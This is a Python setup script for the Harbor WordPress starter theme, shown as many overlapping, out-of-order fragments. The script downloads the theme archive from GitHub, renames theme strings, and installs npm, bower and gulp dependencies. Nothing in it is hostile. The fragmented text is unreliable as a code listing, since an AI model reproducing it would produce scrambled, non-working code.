"python3 # -*- coding: utf-8 -*- \"\"\" Created on Thu Aug 3 14:20:50",
"#print(update_avail.findall(\"├─┬ breakpoint-sass#2.5.0 \")) #exit(0) with open(\"updates.tmp\", \"r\") as update_file: for line in update_file:",
"file.extractall(\".\") print(\"Done!\") return True def setupTheme(): name = input(\"Enter a name for the",
"findInFiles(headerInfo, [\"./\" + slug + \"/style.css\", \"./\" + slug + \"/sass/style.scss\"]) print('Done!') return",
"name = input(\"Enter a name for the theme: \") slug = name.lower().replace(' ',",
"to the harbor script\") parser.add_argument('-i', '--install', action='store_true', dest='install', default=False, help=\"Install harbor theme in",
"') os.rename(\"./Harbor-sass-restructure\", \"./\" + slug) files = glob.glob(\"./\" + slug + \"/*.php\") for",
"\"r\") filedata = file.read() file.close() for change in strings: filedata = filedata.replace(change[0], change[1])",
"else \"which\" npm = subprocess.run(cmd+ \" npm\", shell=True) if npm.returncode == 1: print(\"NodeJs",
"headerInfo = [] headerInfo.append((\"Text Domain: harbor\", \"Text Domain: \" + slug)) headerInfo.append((\"Theme Name:",
"is present updates the Harbor based theme in that directory\") plat = platform.system()",
"stderr=subprocess.PIPE) print(\"Done!\") print(\"Installing dependancies...\") subprocess.run(\"bower install\", shell=True, cwd=\"./\"+slug) subprocess.run(\"npm install\", shell=True, cwd=\"./\"+slug) print(\"Done!\")",
"strings.append((\" <code> Harbor</code>\", \" <code> \" + name.replace(' ', '_') + \"</code>\")) strings.append((\"Harbor-\", slug +",
"Name: \" + name)) headerInfo.append((\"Description: Harbor is a starter theme and development environment",
"script\") parser.add_argument('-i', '--install', action='store_true', dest='install', default=False, help=\"Install harbor theme in current directory\") parser.add_argument('-d',",
"slug = setupTheme() setupEnvironment(slug) elif update: if setup_dir is not None: updateTheme(setup_dir) else:",
"== \"\" or ans.lower()[0] == 'y'): print(\"updating\", name, sep=\" \") os.system(\"bower update \"",
"strings.append((\"Harbor-\", slug + \"-\")) findInFiles(strings, files) headerInfo = [] headerInfo.append((\"Text Domain: harbor\", \"Text",
"is a starter theme and development environment setup by Infinity Marketing that is",
"print(\"Bower is not installed.\") print(\"Installing bower...\") subprocess.run(\"npm install -g bower\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)",
"Infinity Marketing that is heavily based on Automattic's Underscores theme.\", \"Description: \" +",
"up Theme...\") slug = setupTheme() setupEnvironment(slug) elif update: if setup_dir is not None:",
"\"which\" npm = subprocess.run(cmd+ \" npm\", shell=True) if npm.returncode == 1: print(\"NodeJs is",
"'sudo python3 setup.py'\") return #download theme zip if fetchArchive() == False: return 1",
"or ans.lower()[0] == 'y'): print(\"updating\", name, sep=\" \") os.system(\"bower update \" + name)",
"-g bower\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(\"Done!\") gulp = subprocess.run(cmd+ \" gulp\", shell=True, stdout=subprocess.PIPE,",
"True def setupTheme(): name = input(\"Enter a name for the theme: \") slug",
"results = parser.parse_args() install = results.install update = results.update setup_dir = results.dir if(install):",
"# -*- coding: utf-8 -*- \"\"\" Created on Thu Aug 3 14:20:50 2017",
"if setup_dir is not None: os.chdir(setup_dir) if platform.system() != \"Windows\": if os.getuid() !=",
"name)) headerInfo.append((\"Description: Harbor is a starter theme and development environment setup by Infinity",
"+ \"-\")) findInFiles(strings, files) headerInfo = [] headerInfo.append((\"Text Domain: harbor\", \"Text Domain: \"",
"file.read() file.close() for change in strings: filedata = filedata.replace(change[0], change[1]) file = open(filename,",
"== \"Windows\" else \"which\" npm = subprocess.run(cmd+ \" npm\", shell=True) if npm.returncode ==",
"end=' ') file = requests.get(\"https://github.com/Infinity-Marketing/Harbor/archive/sass-restructure.zip\") if file.status_code != 200: print(\"Error: There was a",
"fetchArchive(): try: os.remove(\"sass-restructure.zip\") except FileNotFoundError: pass print(\"Downloading Theme files...\", end=' ') file =",
"ans = input(\"Update module?(Y/n)\") while ans != \"\" and ans.lower()[0] != 'y' and",
"this script as root\") print(\"Example: 'sudo python3 setup.py'\") return #download theme zip if",
"installed.\") print(\"Installing bower...\") subprocess.run(\"npm install -g bower\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(\"Done!\") gulp =",
"import re def main(): parser = argparse.ArgumentParser() parser.add_argument('-u', '--update', action='store_true', dest='update', default=False, help=\"Check",
"import requests import glob import subprocess import platform import sys, getopt import argparse",
"import zipfile import os import requests import glob import subprocess import platform import",
"setupTheme(): name = input(\"Enter a name for the theme: \") slug = name.lower().replace('",
"nameMatch = nameRe.search(line) name = nameMatch.group()[:-1] ans = input(\"Update module?(Y/n)\") while ans !=",
"\"r\") as file: file.extractall(\".\") print(\"Done!\") return True def setupTheme(): name = input(\"Enter a",
"== 1: print(\"NodeJs is not installed. Aborting\") return bower = subprocess.run(cmd+ \" bower\",",
"\" gulp\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if gulp.returncode == 1: print(\"Gulp is not installed\")",
"print(\"Done!\") # Downloads the starter theme _s from github def fetchArchive(): try: os.remove(\"sass-restructure.zip\")",
"not None: updateTheme(setup_dir) else: print(\"Checking for updates to Harbor script...\") print(\"Up to date!\")",
"if gulp.returncode == 1: print(\"Gulp is not installed\") print(\"Installing Gulp...\", end=' ') subprocess.run(\"npm",
"for updates to Harbor script...\") print(\"Up to date!\") else: parser.print_usage() def updateTheme(directory): os.chdir(directory)",
"name.lower().replace(' ', '_') desc = input(\"Enter a short description for the theme: \")",
"= input(\"Enter a name for the theme: \") slug = name.lower().replace(' ', '-')",
"shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(\"Done!\") print(\"Installing dependancies...\") subprocess.run(\"bower install\", shell=True, cwd=\"./\"+slug) subprocess.run(\"npm install\", shell=True,",
"date!\") else: parser.print_usage() def updateTheme(directory): os.chdir(directory) print(\"Updating theme...\") os.system(\"bower list > updates.tmp\") update_avail",
"update_avail = re.compile(\"\\(([0-9]\\.)*[0-9] available\\)\") nameRe = re.compile(\"[a-z]+-*[a-z]*#\") #print(update_avail.findall(\"├─┬ breakpoint-sass#2.5.0 \")) #exit(0) with open(\"updates.tmp\",",
"ans = input(\"Update module?(Y/n)\") if(ans == \"\" or ans.lower()[0] == 'y'): print(\"updating\", name,",
"\"where\" if platform.system() == \"Windows\" else \"which\" npm = subprocess.run(cmd+ \" npm\", shell=True)",
"-u option is present updates the Harbor based theme in that directory\") plat",
"theme...\") os.system(\"bower list > updates.tmp\") update_avail = re.compile(\"\\(([0-9]\\.)*[0-9] available\\)\") nameRe = re.compile(\"[a-z]+-*[a-z]*#\") #print(update_avail.findall(\"├─┬",
"\"\"\" Created on Thu Aug 3 14:20:50 2017 @author: <NAME> \"\"\" import zipfile",
"\" + name) print(\"\") print(\"Done!\") # Downloads the starter theme _s from github",
"shell=True) if npm.returncode == 1: print(\"NodeJs is not installed. Aborting\") return bower =",
"if platform.system() != \"Windows\": if os.getuid() != 0: print(\"Please run this script as",
"Harbor based theme in that directory\") plat = platform.system() results = parser.parse_args() install",
"os.chdir(directory) print(\"Updating theme...\") os.system(\"bower list > updates.tmp\") update_avail = re.compile(\"\\(([0-9]\\.)*[0-9] available\\)\") nameRe =",
"name = nameMatch.group()[:-1] ans = input(\"Update module?(Y/n)\") while ans != \"\" and ans.lower()[0]",
"\" + desc)) findInFiles(headerInfo, [\"./\" + slug + \"/style.css\", \"./\" + slug +",
"filedata = file.read() file.close() for change in strings: filedata = filedata.replace(change[0], change[1]) file",
"bower = subprocess.run(cmd+ \" bower\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if bower.returncode == 1: print(\"Bower",
"file = open(filename, \"r\") filedata = file.read() file.close() for change in strings: filedata",
"change[1]) file = open(filename, \"w\") file.write(filedata) file.close() def setupEnvironment(slug): cmd = \"where\" if",
"action='store_true', dest='update', default=False, help=\"Check for updates to the harbor script\") parser.add_argument('-i', '--install', action='store_true',",
"as update_file: for line in update_file: results = update_avail.findall(line) if results != []:",
"print(\"Done!\") print(\"Installing dependancies...\") subprocess.run(\"bower install\", shell=True, cwd=\"./\"+slug) subprocess.run(\"npm install\", shell=True, cwd=\"./\"+slug) print(\"Done!\") if(__name__",
"main(): parser = argparse.ArgumentParser() parser.add_argument('-u', '--update', action='store_true', dest='update', default=False, help=\"Check for updates to",
"= filedata.replace(change[0], change[1]) file = open(filename, \"w\") file.write(filedata) file.close() def setupEnvironment(slug): cmd =",
"if file.status_code != 200: print(\"Error: There was a problem while downloading the files.\\n\\tAborting.",
"setup_dir is not None: updateTheme(setup_dir) else: print(\"Checking for updates to Harbor script...\") print(\"Up",
"content: content.write(file.content) print(\"Done!\") print(\"Extracting files...\", end=' ') with zipfile.ZipFile(\"sass-restructure.zip\", \"r\") as file: file.extractall(\".\")",
"= glob.glob(\"./\" + slug + \"/*.php\") for filename in glob.glob(\"./\" + slug +",
"based on Automattic's Underscores theme.\", \"Description: \" + desc)) findInFiles(headerInfo, [\"./\" + slug",
"1: print(\"Gulp is not installed\") print(\"Installing Gulp...\", end=' ') subprocess.run(\"npm install -g gulp\",",
"dependancies...\") subprocess.run(\"bower install\", shell=True, cwd=\"./\"+slug) subprocess.run(\"npm install\", shell=True, cwd=\"./\"+slug) print(\"Done!\") if(__name__ == \"__main__\"):",
"= name.lower().replace(' ', '-') funcSlug = name.lower().replace(' ', '_') desc = input(\"Enter a",
"= subprocess.run(cmd+ \" bower\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if bower.returncode == 1: print(\"Bower is",
"line in update_file: results = update_avail.findall(line) if results != []: print(line) nameMatch =",
"\"Windows\": if os.getuid() != 0: print(\"Please run this script as root\") print(\"Example: 'sudo",
"print(\"Setting up Theme...\", end=' ') os.rename(\"./Harbor-sass-restructure\", \"./\" + slug) files = glob.glob(\"./\" +",
"+ \"'\")) strings.append((\"harbor_\", funcSlug + \"_\")) strings.append((\" <code> Harbor</code>\", \" <code> \" + name.replace(' ',",
"= results.install update = results.update setup_dir = results.dir if(install): if setup_dir is not",
"\"Text Domain: \" + slug)) headerInfo.append((\"Theme Name: Harbor\", \"Theme Name: \" + name))",
"update_file: results = update_avail.findall(line) if results != []: print(line) nameMatch = nameRe.search(line) name",
"!= \"\" and ans.lower()[0] != 'y' and ans.lower()[0] != 'n': ans = input(\"Update",
"= input(\"Enter a short description for the theme: \") print(\"Setting up Theme...\", end='",
"harbor script\") parser.add_argument('-i', '--install', action='store_true', dest='install', default=False, help=\"Install harbor theme in current directory\")",
"print(\"Extracting files...\", end=' ') with zipfile.ZipFile(\"sass-restructure.zip\", \"r\") as file: file.extractall(\".\") print(\"Done!\") return True",
"funcSlug = name.lower().replace(' ', '_') desc = input(\"Enter a short description for the",
"setupEnvironment(slug) elif update: if setup_dir is not None: updateTheme(setup_dir) else: print(\"Checking for updates",
"from github def fetchArchive(): try: os.remove(\"sass-restructure.zip\") except FileNotFoundError: pass print(\"Downloading Theme files...\", end='",
"help=\"Specify a directory to install Harbor theme to or if -u option is",
"to date!\") else: parser.print_usage() def updateTheme(directory): os.chdir(directory) print(\"Updating theme...\") os.system(\"bower list > updates.tmp\")",
"subprocess.run(cmd+ \" bower\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if bower.returncode == 1: print(\"Bower is not",
"sys, getopt import argparse import re def main(): parser = argparse.ArgumentParser() parser.add_argument('-u', '--update',",
"if setup_dir is not None: updateTheme(setup_dir) else: print(\"Checking for updates to Harbor script...\")",
"_s from github def fetchArchive(): try: os.remove(\"sass-restructure.zip\") except FileNotFoundError: pass print(\"Downloading Theme files...\",",
"a starter theme and development environment setup by Infinity Marketing that is heavily",
"Harbor is a starter theme and development environment setup by Infinity Marketing that",
"os.chdir(setup_dir) if platform.system() != \"Windows\": if os.getuid() != 0: print(\"Please run this script",
"end=' ') with zipfile.ZipFile(\"sass-restructure.zip\", \"r\") as file: file.extractall(\".\") print(\"Done!\") return True def setupTheme():",
"name.lower().replace(' ', '-') funcSlug = name.lower().replace(' ', '_') desc = input(\"Enter a short",
"script...\") print(\"Up to date!\") else: parser.print_usage() def updateTheme(directory): os.chdir(directory) print(\"Updating theme...\") os.system(\"bower list",
"starter theme _s from github def fetchArchive(): try: os.remove(\"sass-restructure.zip\") except FileNotFoundError: pass print(\"Downloading",
"import platform import sys, getopt import argparse import re def main(): parser =",
"-*- \"\"\" Created on Thu Aug 3 14:20:50 2017 @author: <NAME> \"\"\" import",
"gulp\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if gulp.returncode == 1: print(\"Gulp is not installed\") print(\"Installing",
"<code> Harbor</code>\", \" <code> \" + name.replace(' ', '_') + \"</code>\")) strings.append((\"Harbor-\", slug + \"-\"))",
"strings: filedata = filedata.replace(change[0], change[1]) file = open(filename, \"w\") file.write(filedata) file.close() def setupEnvironment(slug):",
"= open(filename, \"w\") file.write(filedata) file.close() def setupEnvironment(slug): cmd = \"where\" if platform.system() ==",
"update: if setup_dir is not None: updateTheme(setup_dir) else: print(\"Checking for updates to Harbor",
"files: file = open(filename, \"r\") filedata = file.read() file.close() for change in strings:",
"+ slug)) headerInfo.append((\"Theme Name: Harbor\", \"Theme Name: \" + name)) headerInfo.append((\"Description: Harbor is",
"!= 0: print(\"Please run this script as root\") print(\"Example: 'sudo python3 setup.py'\") return",
"slug + \"/sass/style.scss\"]) print('Done!') return slug def findInFiles(strings, files): for filename in files:",
"action='store_true', dest='install', default=False, help=\"Install harbor theme in current directory\") parser.add_argument('-d', '--directory', action='store', dest='dir',",
"shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if bower.returncode == 1: print(\"Bower is not installed.\") print(\"Installing bower...\")",
"print(\"Setting up Theme...\") slug = setupTheme() setupEnvironment(slug) elif update: if setup_dir is not",
"#download theme zip if fetchArchive() == False: return 1 print(\"Setting up Theme...\") slug",
"except FileNotFoundError: pass print(\"Downloading Theme files...\", end=' ') file = requests.get(\"https://github.com/Infinity-Marketing/Harbor/archive/sass-restructure.zip\") if file.status_code",
"open(filename, \"w\") file.write(filedata) file.close() def setupEnvironment(slug): cmd = \"where\" if platform.system() == \"Windows\"",
"filename in files: file = open(filename, \"r\") filedata = file.read() file.close() for change",
"#! /usr/bin/env python3 # -*- coding: utf-8 -*- \"\"\" Created on Thu Aug",
"\"</code>\")) strings.append((\"Harbor-\", slug + \"-\")) findInFiles(strings, files) headerInfo = [] headerInfo.append((\"Text Domain: harbor\",",
"cmd = \"where\" if platform.system() == \"Windows\" else \"which\" npm = subprocess.run(cmd+ \"",
"Harbor\", \"Theme Name: \" + name)) headerInfo.append((\"Description: Harbor is a starter theme and",
"present updates the Harbor based theme in that directory\") plat = platform.system() results",
"if(ans == \"\" or ans.lower()[0] == 'y'): print(\"updating\", name, sep=\" \") os.system(\"bower update",
"[\"./\" + slug + \"/style.css\", \"./\" + slug + \"/sass/style.scss\"]) print('Done!') return slug",
"on Automattic's Underscores theme.\", \"Description: \" + desc)) findInFiles(headerInfo, [\"./\" + slug +",
"run this script as root\") print(\"Example: 'sudo python3 setup.py'\") return #download theme zip",
"files = glob.glob(\"./\" + slug + \"/*.php\") for filename in glob.glob(\"./\" + slug",
"installed. Aborting\") return bower = subprocess.run(cmd+ \" bower\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if bower.returncode",
"\"\"\" import zipfile import os import requests import glob import subprocess import platform",
"file = requests.get(\"https://github.com/Infinity-Marketing/Harbor/archive/sass-restructure.zip\") if file.status_code != 200: print(\"Error: There was a problem while",
"theme.\", \"Description: \" + desc)) findInFiles(headerInfo, [\"./\" + slug + \"/style.css\", \"./\" +",
"'--update', action='store_true', dest='update', default=False, help=\"Check for updates to the harbor script\") parser.add_argument('-i', '--install',",
"+ \"/style.css\", \"./\" + slug + \"/sass/style.scss\"]) print('Done!') return slug def findInFiles(strings, files):",
"parser = argparse.ArgumentParser() parser.add_argument('-u', '--update', action='store_true', dest='update', default=False, help=\"Check for updates to the",
"= results.update setup_dir = results.dir if(install): if setup_dir is not None: os.chdir(setup_dir) if",
"headerInfo.append((\"Theme Name: Harbor\", \"Theme Name: \" + name)) headerInfo.append((\"Description: Harbor is a starter",
"os.getuid() != 0: print(\"Please run this script as root\") print(\"Example: 'sudo python3 setup.py'\")",
"is heavily based on Automattic's Underscores theme.\", \"Description: \" + desc)) findInFiles(headerInfo, [\"./\"",
"!= \"Windows\": if os.getuid() != 0: print(\"Please run this script as root\") print(\"Example:",
"not installed\") print(\"Installing Gulp...\", end=' ') subprocess.run(\"npm install -g gulp\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)",
"updates.tmp\") update_avail = re.compile(\"\\(([0-9]\\.)*[0-9] available\\)\") nameRe = re.compile(\"[a-z]+-*[a-z]*#\") #print(update_avail.findall(\"├─┬ breakpoint-sass#2.5.0 \")) #exit(0) with",
"npm = subprocess.run(cmd+ \" npm\", shell=True) if npm.returncode == 1: print(\"NodeJs is not",
"file.close() def setupEnvironment(slug): cmd = \"where\" if platform.system() == \"Windows\" else \"which\" npm",
"default=False, help=\"Install harbor theme in current directory\") parser.add_argument('-d', '--directory', action='store', dest='dir', help=\"Specify a",
"while downloading the files.\\n\\tAborting. \") return False with open(\"sass-restructure.zip\", \"wb\") as content: content.write(file.content)",
"slug = name.lower().replace(' ', '-') funcSlug = name.lower().replace(' ', '_') desc = input(\"Enter",
"print(\"Updating theme...\") os.system(\"bower list > updates.tmp\") update_avail = re.compile(\"\\(([0-9]\\.)*[0-9] available\\)\") nameRe = re.compile(\"[a-z]+-*[a-z]*#\")",
"Theme files...\", end=' ') file = requests.get(\"https://github.com/Infinity-Marketing/Harbor/archive/sass-restructure.zip\") if file.status_code != 200: print(\"Error: There",
"import sys, getopt import argparse import re def main(): parser = argparse.ArgumentParser() parser.add_argument('-u',",
"open(filename, \"r\") filedata = file.read() file.close() for change in strings: filedata = filedata.replace(change[0],",
"'-') funcSlug = name.lower().replace(' ', '_') desc = input(\"Enter a short description for",
"stdout=subprocess.PIPE, stderr=subprocess.PIPE) if gulp.returncode == 1: print(\"Gulp is not installed\") print(\"Installing Gulp...\", end='",
"stderr=subprocess.PIPE) print(\"Done!\") gulp = subprocess.run(cmd+ \" gulp\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if gulp.returncode ==",
"open(\"updates.tmp\", \"r\") as update_file: for line in update_file: results = update_avail.findall(line) if results",
"\"/*/*.php\"): files.append(filename) strings = [] strings.append((\"'harbor'\", \"'\" + slug + \"'\")) strings.append((\"harbor_\", funcSlug",
"= nameRe.search(line) name = nameMatch.group()[:-1] ans = input(\"Update module?(Y/n)\") while ans != \"\"",
"print(\"Example: 'sudo python3 setup.py'\") return #download theme zip if fetchArchive() == False: return",
"argparse.ArgumentParser() parser.add_argument('-u', '--update', action='store_true', dest='update', default=False, help=\"Check for updates to the harbor script\")",
"1: print(\"NodeJs is not installed. Aborting\") return bower = subprocess.run(cmd+ \" bower\", shell=True,",
"to or if -u option is present updates the Harbor based theme in",
"install -g gulp\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(\"Done!\") print(\"Installing dependancies...\") subprocess.run(\"bower install\", shell=True, cwd=\"./\"+slug)",
"updates the Harbor based theme in that directory\") plat = platform.system() results =",
"module?(Y/n)\") if(ans == \"\" or ans.lower()[0] == 'y'): print(\"updating\", name, sep=\" \") os.system(\"bower",
"\"w\") file.write(filedata) file.close() def setupEnvironment(slug): cmd = \"where\" if platform.system() == \"Windows\" else",
"else: print(\"Checking for updates to Harbor script...\") print(\"Up to date!\") else: parser.print_usage() def",
"') file = requests.get(\"https://github.com/Infinity-Marketing/Harbor/archive/sass-restructure.zip\") if file.status_code != 200: print(\"Error: There was a problem",
"\"/sass/style.scss\"]) print('Done!') return slug def findInFiles(strings, files): for filename in files: file =",
"subprocess import platform import sys, getopt import argparse import re def main(): parser",
"try: os.remove(\"sass-restructure.zip\") except FileNotFoundError: pass print(\"Downloading Theme files...\", end=' ') file = requests.get(\"https://github.com/Infinity-Marketing/Harbor/archive/sass-restructure.zip\")",
"def findInFiles(strings, files): for filename in files: file = open(filename, \"r\") filedata =",
"') subprocess.run(\"npm install -g gulp\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(\"Done!\") print(\"Installing dependancies...\") subprocess.run(\"bower install\",",
"with open(\"sass-restructure.zip\", \"wb\") as content: content.write(file.content) print(\"Done!\") print(\"Extracting files...\", end=' ') with zipfile.ZipFile(\"sass-restructure.zip\",",
"input(\"Update module?(Y/n)\") if(ans == \"\" or ans.lower()[0] == 'y'): print(\"updating\", name, sep=\" \")",
"update = results.update setup_dir = results.dir if(install): if setup_dir is not None: os.chdir(setup_dir)",
"[]: print(line) nameMatch = nameRe.search(line) name = nameMatch.group()[:-1] ans = input(\"Update module?(Y/n)\") while",
"with zipfile.ZipFile(\"sass-restructure.zip\", \"r\") as file: file.extractall(\".\") print(\"Done!\") return True def setupTheme(): name =",
"strings.append((\"harbor_\", funcSlug + \"_\")) strings.append((\" <code> Harbor</code>\", \" <code> \" + name.replace(' ', '_') +",
"theme zip if fetchArchive() == False: return 1 print(\"Setting up Theme...\") slug =",
"\"\" and ans.lower()[0] != 'y' and ans.lower()[0] != 'n': ans = input(\"Update module?(Y/n)\")",
"based theme in that directory\") plat = platform.system() results = parser.parse_args() install =",
"short description for the theme: \") print(\"Setting up Theme...\", end=' ') os.rename(\"./Harbor-sass-restructure\", \"./\"",
"<NAME> \"\"\" import zipfile import os import requests import glob import subprocess import",
"= re.compile(\"\\(([0-9]\\.)*[0-9] available\\)\") nameRe = re.compile(\"[a-z]+-*[a-z]*#\") #print(update_avail.findall(\"├─┬ breakpoint-sass#2.5.0 \")) #exit(0) with open(\"updates.tmp\", \"r\")",
"return True def setupTheme(): name = input(\"Enter a name for the theme: \")",
"\" + name)) headerInfo.append((\"Description: Harbor is a starter theme and development environment setup",
"name.replace(' ', '_') + \"</code>\")) strings.append((\"Harbor-\", slug + \"-\")) findInFiles(strings, files) headerInfo =",
"ans.lower()[0] != 'n': ans = input(\"Update module?(Y/n)\") if(ans == \"\" or ans.lower()[0] ==",
"<reponame>InfinityMarketing/Harbor-Script #! /usr/bin/env python3 # -*- coding: utf-8 -*- \"\"\" Created on Thu",
"Harbor script...\") print(\"Up to date!\") else: parser.print_usage() def updateTheme(directory): os.chdir(directory) print(\"Updating theme...\") os.system(\"bower",
"update_file: for line in update_file: results = update_avail.findall(line) if results != []: print(line)",
"= platform.system() results = parser.parse_args() install = results.install update = results.update setup_dir =",
"nameRe.search(line) name = nameMatch.group()[:-1] ans = input(\"Update module?(Y/n)\") while ans != \"\" and",
"Created on Thu Aug 3 14:20:50 2017 @author: <NAME> \"\"\" import zipfile import",
"= input(\"Update module?(Y/n)\") while ans != \"\" and ans.lower()[0] != 'y' and ans.lower()[0]",
"by Infinity Marketing that is heavily based on Automattic's Underscores theme.\", \"Description: \"",
"= [] strings.append((\"'harbor'\", \"'\" + slug + \"'\")) strings.append((\"harbor_\", funcSlug + \"_\")) strings.append((\"",
"# Downloads the starter theme _s from github def fetchArchive(): try: os.remove(\"sass-restructure.zip\") except",
"= [] headerInfo.append((\"Text Domain: harbor\", \"Text Domain: \" + slug)) headerInfo.append((\"Theme Name: Harbor\",",
"starter theme and development environment setup by Infinity Marketing that is heavily based",
"bower\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if bower.returncode == 1: print(\"Bower is not installed.\") print(\"Installing",
"directory\") parser.add_argument('-d', '--directory', action='store', dest='dir', help=\"Specify a directory to install Harbor theme to",
"+ slug + \"/*/*.php\"): files.append(filename) strings = [] strings.append((\"'harbor'\", \"'\" + slug +",
"updates to Harbor script...\") print(\"Up to date!\") else: parser.print_usage() def updateTheme(directory): os.chdir(directory) print(\"Updating",
"npm.returncode == 1: print(\"NodeJs is not installed. Aborting\") return bower = subprocess.run(cmd+ \"",
"return bower = subprocess.run(cmd+ \" bower\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if bower.returncode == 1:",
"if -u option is present updates the Harbor based theme in that directory\")",
"default=False, help=\"Check for updates to the harbor script\") parser.add_argument('-i', '--install', action='store_true', dest='install', default=False,",
"findInFiles(strings, files): for filename in files: file = open(filename, \"r\") filedata = file.read()",
"+ \"/sass/style.scss\"]) print('Done!') return slug def findInFiles(strings, files): for filename in files: file",
"the theme: \") print(\"Setting up Theme...\", end=' ') os.rename(\"./Harbor-sass-restructure\", \"./\" + slug) files",
"file = open(filename, \"w\") file.write(filedata) file.close() def setupEnvironment(slug): cmd = \"where\" if platform.system()",
"print(\"Error: There was a problem while downloading the files.\\n\\tAborting. \") return False with",
"\"r\") as update_file: for line in update_file: results = update_avail.findall(line) if results !=",
"results.install update = results.update setup_dir = results.dir if(install): if setup_dir is not None:",
"up Theme...\", end=' ') os.rename(\"./Harbor-sass-restructure\", \"./\" + slug) files = glob.glob(\"./\" + slug",
"for updates to the harbor script\") parser.add_argument('-i', '--install', action='store_true', dest='install', default=False, help=\"Install harbor",
"files.append(filename) strings = [] strings.append((\"'harbor'\", \"'\" + slug + \"'\")) strings.append((\"harbor_\", funcSlug +",
"', '_') + \"</code>\")) strings.append((\"Harbor-\", slug + \"-\")) findInFiles(strings, files) headerInfo = []",
"setup.py'\") return #download theme zip if fetchArchive() == False: return 1 print(\"Setting up",
"= results.dir if(install): if setup_dir is not None: os.chdir(setup_dir) if platform.system() != \"Windows\":",
"and ans.lower()[0] != 'n': ans = input(\"Update module?(Y/n)\") if(ans == \"\" or ans.lower()[0]",
"\"Description: \" + desc)) findInFiles(headerInfo, [\"./\" + slug + \"/style.css\", \"./\" + slug",
"subprocess.run(\"npm install -g gulp\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(\"Done!\") print(\"Installing dependancies...\") subprocess.run(\"bower install\", shell=True,",
"if results != []: print(line) nameMatch = nameRe.search(line) name = nameMatch.group()[:-1] ans =",
"platform.system() == \"Windows\" else \"which\" npm = subprocess.run(cmd+ \" npm\", shell=True) if npm.returncode",
"findInFiles(strings, files) headerInfo = [] headerInfo.append((\"Text Domain: harbor\", \"Text Domain: \" + slug))",
"+ name.replace(' ', '_') + \"</code>\")) strings.append((\"Harbor-\", slug + \"-\")) findInFiles(strings, files) headerInfo",
"github def fetchArchive(): try: os.remove(\"sass-restructure.zip\") except FileNotFoundError: pass print(\"Downloading Theme files...\", end=' ')",
"+ \"/*.php\") for filename in glob.glob(\"./\" + slug + \"/*/*.php\"): files.append(filename) strings =",
"platform.system() results = parser.parse_args() install = results.install update = results.update setup_dir = results.dir",
"14:20:50 2017 @author: <NAME> \"\"\" import zipfile import os import requests import glob",
"[] headerInfo.append((\"Text Domain: harbor\", \"Text Domain: \" + slug)) headerInfo.append((\"Theme Name: Harbor\", \"Theme",
"strings.append((\"'harbor'\", \"'\" + slug + \"'\")) strings.append((\"harbor_\", funcSlug + \"_\")) strings.append((\" <code> Harbor</code>\", \"",
"desc = input(\"Enter a short description for the theme: \") print(\"Setting up Theme...\",",
"!= 'n': ans = input(\"Update module?(Y/n)\") if(ans == \"\" or ans.lower()[0] == 'y'):",
"re def main(): parser = argparse.ArgumentParser() parser.add_argument('-u', '--update', action='store_true', dest='update', default=False, help=\"Check for",
"name for the theme: \") slug = name.lower().replace(' ', '-') funcSlug = name.lower().replace('",
"Theme...\", end=' ') os.rename(\"./Harbor-sass-restructure\", \"./\" + slug) files = glob.glob(\"./\" + slug +",
"+ \"</code>\")) strings.append((\"Harbor-\", slug + \"-\")) findInFiles(strings, files) headerInfo = [] headerInfo.append((\"Text Domain:",
"theme: \") slug = name.lower().replace(' ', '-') funcSlug = name.lower().replace(' ', '_') desc",
"!= []: print(line) nameMatch = nameRe.search(line) name = nameMatch.group()[:-1] ans = input(\"Update module?(Y/n)\")",
"install Harbor theme to or if -u option is present updates the Harbor",
"if bower.returncode == 1: print(\"Bower is not installed.\") print(\"Installing bower...\") subprocess.run(\"npm install -g",
"\") return False with open(\"sass-restructure.zip\", \"wb\") as content: content.write(file.content) print(\"Done!\") print(\"Extracting files...\", end='",
"parser.add_argument('-d', '--directory', action='store', dest='dir', help=\"Specify a directory to install Harbor theme to or",
"environment setup by Infinity Marketing that is heavily based on Automattic's Underscores theme.\",",
"files...\", end=' ') file = requests.get(\"https://github.com/Infinity-Marketing/Harbor/archive/sass-restructure.zip\") if file.status_code != 200: print(\"Error: There was",
"2017 @author: <NAME> \"\"\" import zipfile import os import requests import glob import",
"os.system(\"bower list > updates.tmp\") update_avail = re.compile(\"\\(([0-9]\\.)*[0-9] available\\)\") nameRe = re.compile(\"[a-z]+-*[a-z]*#\") #print(update_avail.findall(\"├─┬ breakpoint-sass#2.5.0",
"def updateTheme(directory): os.chdir(directory) print(\"Updating theme...\") os.system(\"bower list > updates.tmp\") update_avail = re.compile(\"\\(([0-9]\\.)*[0-9] available\\)\")",
"def fetchArchive(): try: os.remove(\"sass-restructure.zip\") except FileNotFoundError: pass print(\"Downloading Theme files...\", end=' ') file",
"\" <code> \" + name.replace(' ', '_') + \"</code>\")) strings.append((\"Harbor-\", slug + \"-\")) findInFiles(strings,",
"zip if fetchArchive() == False: return 1 print(\"Setting up Theme...\") slug = setupTheme()",
"glob.glob(\"./\" + slug + \"/*.php\") for filename in glob.glob(\"./\" + slug + \"/*/*.php\"):",
"Underscores theme.\", \"Description: \" + desc)) findInFiles(headerInfo, [\"./\" + slug + \"/style.css\", \"./\"",
"on Thu Aug 3 14:20:50 2017 @author: <NAME> \"\"\" import zipfile import os",
"the theme: \") slug = name.lower().replace(' ', '-') funcSlug = name.lower().replace(' ', '_')",
"requests import glob import subprocess import platform import sys, getopt import argparse import",
